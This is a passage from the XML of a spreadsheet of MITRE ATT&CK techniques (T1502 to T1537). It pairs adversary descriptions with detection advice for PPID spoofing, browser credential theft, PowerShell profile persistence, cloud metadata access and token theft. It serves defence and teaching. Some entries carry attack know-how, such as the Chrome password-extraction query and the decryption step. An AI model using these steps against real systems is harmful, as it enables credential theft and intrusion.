While adversaries typically require root privileges to create/modify service unit files in the &lt;code&gt;/etc/systemd/system&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; directories, low privilege users can create/modify service unit files in directories such as &lt;code&gt;~/.config/systemd/user/&lt;/code&gt; to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)</t>
  </si>
  <si>
    <t>T1502</t>
  </si>
  <si>
    <t>Parent PID Spoofing</t>
  </si>
  <si>
    <t>Windows event logs,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt;, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of &lt;code&gt;CreateProcess&lt;/code&gt;/&lt;code&gt;CreateProcessA&lt;/code&gt; may also be proceeded by a call to &lt;code&gt;UpdateProcThreadAttribute&lt;/code&gt;, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.</t>
  </si>
  <si>
    <t>Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the &lt;code&gt;CreateProcess&lt;/code&gt; API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via &lt;code&gt;svchost.exe&lt;/code&gt; or &lt;code&gt;consent.exe&lt;/code&gt;) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be &lt;code&gt;explorer.exe&lt;/code&gt; rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via VBA [Scripting](https://attack.mitre.org/techniques/T1064) within a malicious Office document or any code that can perform [Execution through API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) (given appropriate access rights to the parent process). For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as &lt;code&gt;lsass.exe&lt;/code&gt;), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)</t>
  </si>
  <si>
    <t>Host forensic analysis,Heuristic Detection</t>
  </si>
  <si>
    <t>T1503</t>
  </si>
  <si>
    <t>Credentials from Web Browsers</t>
  </si>
  <si>
    <t>Process monitoring,PowerShell logs,File monitoring,API monitoring</t>
  </si>
  <si>
    <t>Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).</t>
  </si>
  <si>
    <t>Adversaries may acquire credentials from web browsers by reading files specific to the target browser.  (Citation: Talos Olympic Destroyer 2018) 
Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.
For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt; and executing a SQL query: &lt;code&gt;SELECT action_url, username_value, password_value FROM logins;&lt;/code&gt;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function &lt;code&gt;CryptUnprotectData&lt;/code&gt;, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData ‎April 2018)
Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)
Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)
After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).</t>
  </si>
  <si>
    <t>T1504</t>
  </si>
  <si>
    <t>PowerShell Profile</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile  (&lt;code&gt;profile.ps1&lt;/code&gt;) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) 
Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the &lt;code&gt;-NoProfile&lt;/code&gt; flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) 
An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>File monitoring,Application logs</t>
  </si>
  <si>
    <t>Windows,Linux</t>
  </si>
  <si>
    <t>Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components. On MSSQL Server, consider monitoring for &lt;code&gt;xp_cmdshell&lt;/code&gt; usage.(Citation: NetSPI Startup Stored Procedures)</t>
  </si>
  <si>
    <t>Adversaries may abuse legitimate extensible development features of server applications to establish persistent access to systems. Enterprise server applications may include features that allow application developers to write and install software to extend the functionality of the main application. Adversaries may install malicious software components to maliciously extend and abuse server applications.
###Transport Agent
Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks.
Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.
###SQL Stored Procedures
SQL stored procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted). Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as &lt;code&gt;xp_cmdshell&lt;/code&gt; for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017)
Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures, these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR)</t>
  </si>
  <si>
    <t>T1506</t>
  </si>
  <si>
    <t>Web Session Cookie</t>
  </si>
  <si>
    <t>Authentication logs,Office 365 account logs</t>
  </si>
  <si>
    <t>Office 365,SaaS</t>
  </si>
  <si>
    <t>Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary then imports the cookie into a browser they control and is able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019) </t>
  </si>
  <si>
    <t>defense-evasion,lateral-movement</t>
  </si>
  <si>
    <t>Logon Credentials,Multi-Factor Authentication</t>
  </si>
  <si>
    <t>T1514</t>
  </si>
  <si>
    <t>Elevated Execution with Prompt</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.</t>
  </si>
  <si>
    <t>Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating.  This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.
Adversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>T1519</t>
  </si>
  <si>
    <t>Emond</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created or modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at &lt;code&gt;/sbin/emond&lt;/code&gt; will load any rules from the &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; directory and take action once an explicitly defined event takes place. The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1160) configuration file at&lt;code&gt;/System/Library/LaunchDaemons/com.apple.emond.plist&lt;/code&gt;.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1160) service.</t>
  </si>
  <si>
    <t>T1522</t>
  </si>
  <si>
    <t>Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>Azure activity logs,AWS CloudTrail logs,Authentication logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure</t>
  </si>
  <si>
    <t xml:space="preserve">* Monitor access to the Instance Metadata API and look for anomalous queries.
* It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at &lt;code&gt;http[:]//169.254.169.254&lt;/code&gt;.
</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>Implant Container Image</t>
  </si>
  <si>
    <t>GCP,Azure,AWS</t>
  </si>
  <si>
    <t>Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.</t>
  </si>
  <si>
    <t xml:space="preserve">Amazon Web Service (AWS) Amazon Machine Images (AMI), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored to include malicious code. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a web shell.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019) Adversaries may also implant Docker images that may be inadvertently used in cloud deployments, which has been reported in some instances of cryptomining botnets.(Citation: ATT Cybersecurity Cryptocurrency Attacks on Cloud) </t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>AWS,GCP,Azure,Azure AD,Office 365,SaaS</t>
  </si>
  <si>
    <t>Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.</t>
  </si>
  <si>
    <t>An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ depending on if it's platform-as-a-service (PaaS), infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many different services exist throughout the various cloud providers and can include continuous integration and continuous delivery (CI/CD), Lambda Functions, Azure AD, etc. Adversaries may attempt to discover information about the services enabled throughout the environment.
Pacu, an open source AWS exploitation framework, supports several methods for discovering cloud services.(Citation: GitHub Pacu)</t>
  </si>
  <si>
    <t>T1527</t>
  </si>
  <si>
    <t>Application Access Token</t>
  </si>
  <si>
    <t>OAuth audit logs,Office 365 account logs</t>
  </si>
  <si>
    <t>SaaS,Office 365</t>
  </si>
  <si>
    <t>Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications. Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.
Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)
For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)
Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.
</t>
  </si>
  <si>
    <t>Multi-Factor Authentication,Logon Credentials</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>Azure activity logs,OAuth audit logs</t>
  </si>
  <si>
    <t>SaaS,Office 365,Azure AD</t>
  </si>
  <si>
    <t>Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.
Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.</t>
  </si>
  <si>
    <t>Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access.
Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. 
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1192) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1527).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</t>
  </si>
  <si>
    <t>Windows event logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.</t>
  </si>
  <si>
    <t>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>Data from Cloud Storage Object</t>
  </si>
  <si>
    <t>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</t>
  </si>
  <si>
    <t>Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.</t>
  </si>
  <si>
    <t>Adversaries may access data objects from improperly secured cloud storage.
Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)
Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.</t>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>Account Access Removal</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
* Event ID 4723 - An attempt was made to change an account's password
* Event ID 4724 - An attempt was made to reset an account's password
* Event ID 4726 - A user account was deleted
* Event ID 4740 - A user account was locked out
Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
Adversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Internal Spearphishing</t>
  </si>
  <si>
    <t>SSL/TLS inspection,DNS records,Anti-virus,Web proxy,File monitoring,Mail server,Office 365 trace logs</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)</t>
  </si>
  <si>
    <t>Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)
Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) or [Spearphishing Link](https://attack.mitre.org/techniques/T1192) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.
There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions</t>
  </si>
  <si>
    <t>Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.
Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.
A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity. For example, AWS GuardDuty is not supported in every region.(Citation: AWS Region Service Table)
An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>T1536</t>
  </si>
  <si>
    <t>Revert Cloud Instance</t>
  </si>
  <si>
    <t>Azure OS logs,AWS CloudTrail logs,Azure activity logs,Stackdriver logs,AWS OS logs</t>
  </si>
  <si>
    <t>Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g. tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be easily facilitated using restoration from VM or data storage snapshots through the cloud management dashboard. Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the latter types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>Azure,AWS,GCP</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. </t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.
